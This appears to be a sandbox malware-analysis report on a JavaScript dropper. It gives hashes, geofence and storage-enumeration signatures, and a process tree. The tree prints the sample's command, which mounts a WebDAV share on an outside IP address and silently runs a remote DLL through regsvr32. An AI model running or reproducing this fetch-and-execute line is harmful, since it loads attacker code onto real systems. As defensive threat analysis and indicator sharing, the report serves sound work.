Analysis
-
max time kernel
132s -
max time network
125s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
24/07/2024, 03:36
Static task
static1
Behavioral task
behavioral1
Sample
1363323782094811577.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
1363323782094811577.js
Resource
win10v2004-20240709-en
General
-
Target
1363323782094811577.js
-
Size
6KB
-
MD5
9fcbe173053166060c0df2f21f884a91
-
SHA1
e2c7b75305dd933d547bde583a892d1e5087ee5d
-
SHA256
91e220658fcecda01abe2ecea402b7d263a3404c744e8d73e517165173b6efcd
-
SHA512
39fa371a66f246941e6cdd623c3321727f59791d2e81cef89ff877abe36475382986394b376fdb1a04bf7525dc9b7eca39ff5162a49d6879b9bfc55f876c462a
-
SSDEEP
96:eaefRBkUmSLLvnm+/WIG3m36fSz5pDffrdcPOEnSU9xCBLIGRNi6+6rZvstX+oUF:uPi5abx2O6T3cuhAkg3cuhuNu
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 540 wrote to memory of 1824 540 wscript.exe 84 PID 540 wrote to memory of 1824 540 wscript.exe 84 PID 1824 wrote to memory of 3920 1824 cmd.exe 86 PID 1824 wrote to memory of 3920 1824 cmd.exe 86
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\1363323782094811577.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:540 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\312852320031783.dll2⤵
- Suspicious use of WriteProcessMemory
PID:1824 -
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵PID:3920
-
-